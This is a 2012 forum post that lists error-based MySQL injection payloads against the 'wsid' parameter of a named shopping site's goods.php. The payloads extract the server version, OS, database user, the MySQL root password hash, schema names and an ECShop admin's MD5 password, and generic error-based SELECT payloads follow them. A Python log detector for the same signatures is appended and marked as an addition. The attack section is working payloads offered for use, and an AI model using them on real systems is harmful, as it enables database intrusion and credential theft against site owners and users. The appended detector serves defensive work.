Blind injection details

Posted on 2012-9-5 14:59:30
Determine the version number
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database table name

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database user_name column

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database password column

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Get admin passwd (md5)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Error-based injection

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
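Added example, not part of the original post: a small log-side detector for the floor(rand()*2) / GROUP BY duplicate-key signature that every payload above relies on, run over constructed access-log lines. The log format, the client address and the two probe requests are assumptions modelled on the post's payloads.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Signatures of the floor(rand()*2) / GROUP BY duplicate-key technique, checked
# against URL-decoded, lowercased, whitespace-collapsed query parameter values.
SIGNATURES = {
    "rand_floor_groupby": re.compile(r"floor\s*\(\s*rand\s*\(.*?\)\s*\*\s*2\s*\).*?group\s+by", re.S),
    "count_concat": re.compile(r"count\s*\(\s*\*\s*\)\s*,\s*concat\s*\("),
    "row_compare_subselect": re.compile(r"\(\s*1\s*,\s*1\s*\)\s*>\s*\(\s*select"),
    "info_schema": re.compile(r"information_schema\.(tables|columns|schemata)"),
    "mysql_user": re.compile(r"mysql\.user"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')  # request target in a CLF line

def normalise(value: str) -> str:
    """Decode once more (catches double-encoding), lowercase, collapse whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(value)).lower()

def scan_request(raw_url: str) -> list[str]:
    """Names of the signatures matched by any query parameter of one request."""
    hits: list[str] = []
    for _, value in parse_qsl(urlsplit(raw_url).query, keep_blank_values=True):
        norm = normalise(value)
        hits += [n for n, pat in SIGNATURES.items() if n not in hits and pat.search(norm)]
    return hits

def scan_log(lines: list[str]) -> list[tuple[str, list[str]]]:
    """(request target, matched signatures) for each line matching at least one."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and (hits := scan_request(m.group(1))):
            findings.append((m.group(1), hits))
    return findings

# Constructed access-log lines (placeholder client address): one normal request,
# then two probes shaped like the version and table-name payloads in the post.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Sep/2012:14:59:30 +0800] "GET /goods.php?id=352&wsid=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [05/Sep/2012:14:59:41 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E'
    '(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20'
    '(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 221',
    '203.0.113.7 - - [05/Sep/2012:15:00:02 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E'
    '(select%20count(*),concat((select%20TABLE_NAME%20from%20information_schema.tables%20limit%206,1),'
    '0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23'
    ' HTTP/1.1" 500 221',
]

if __name__ == "__main__":
    for target, hits in scan_log(SAMPLE_LOG):
        print(", ".join(hits), "<-", target[:70])
```

The combination of a 5xx response with these signatures is the practical alert condition, since the technique only works when the duplicate-key error reaches the client.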